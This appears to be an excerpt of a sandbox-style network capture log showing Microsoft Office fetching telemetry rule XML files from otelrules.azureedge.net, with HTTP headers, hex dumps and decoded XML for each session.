                                                                                                                    2024-11-30 10:35:33 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    106192.168.2.44985613.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:33 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:34 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:34 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 419
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                    ETag: "0x8DC582BA6CF78C8"
                                                                                                                    x-ms-request-id: 4f79ec39-601e-0070-0891-3fa0c9000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103534Z-174f7845968xlwnmhC1EWR0sv8000000113g000000005k39
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:34 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    107192.168.2.44985713.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:34 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:34 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:34 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 472
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                    ETag: "0x8DC582B984BF177"
                                                                                                                    x-ms-request-id: 5c7cfbca-b01e-0002-28f7-411b8f000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103534Z-174f7845968qj8jrhC1EWRh41s00000011bg0000000008v8
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:34 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    108192.168.2.44985813.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:34 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:35 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:34 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 405
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                    ETag: "0x8DC582B942B6AFF"
                                                                                                                    x-ms-request-id: a9f050e4-401e-0083-111c-41075c000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103534Z-174f784596886s2bhC1EWR743w00000011dg0000000020xz
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:35 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    109192.168.2.44985913.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:34 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:35 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:35 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 468
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                    ETag: "0x8DC582BBA642BF4"
                                                                                                                    x-ms-request-id: f58191a5-b01e-003e-1291-3f8e41000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103535Z-174f7845968swgbqhC1EWRmnb400000011bg000000008gua
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:35 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    110192.168.2.44986013.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:35 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:35 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:35 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 174
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                    ETag: "0x8DC582B91D80E15"
                                                                                                                    x-ms-request-id: dc6365ef-001e-0034-0cb3-42dd04000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103535Z-174f7845968glpgnhC1EWR7uec00000011c0000000008v76
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:35 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    111192.168.2.44986113.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:36 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:36 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:36 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1952
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                    ETag: "0x8DC582B956B0F3D"
                                                                                                                    x-ms-request-id: fdde7aaa-d01e-0028-2a8c-3f7896000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103536Z-174f7845968frfdmhC1EWRxxbw00000011eg0000000010cv
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:36 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    112192.168.2.44986213.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:36 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:36 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:36 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 958
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                    ETag: "0x8DC582BA0A31B3B"
                                                                                                                    x-ms-request-id: 11676492-b01e-003d-10f9-41d32c000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103536Z-174f7845968psccphC1EWRuz9s00000011e0000000009vru
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:36 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    113192.168.2.44986313.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:36 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:37 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:37 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 501
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                    ETag: "0x8DC582BACFDAACD"
                                                                                                                    x-ms-request-id: 42ae9f56-701e-0001-1d37-40b110000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103537Z-174f7845968qj8jrhC1EWRh41s0000001150000000008gs2
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:37 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    114192.168.2.44986413.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:37 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:37 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:37 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 2592
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                    ETag: "0x8DC582BB5B890DB"
                                                                                                                    x-ms-request-id: e5837872-c01e-00a1-6f26-417e4a000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103537Z-174f7845968pght8hC1EWRyvxg00000004k0000000000ayk
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:37 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    115192.168.2.44986513.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:37 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:37 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:37 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 3342
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                    ETag: "0x8DC582B927E47E9"
                                                                                                                    x-ms-request-id: 6eac8613-a01e-006f-3091-3f13cd000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103537Z-174f78459688l8rvhC1EWRtzr00000000dv000000000744p
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:37 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    116192.168.2.44986613.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
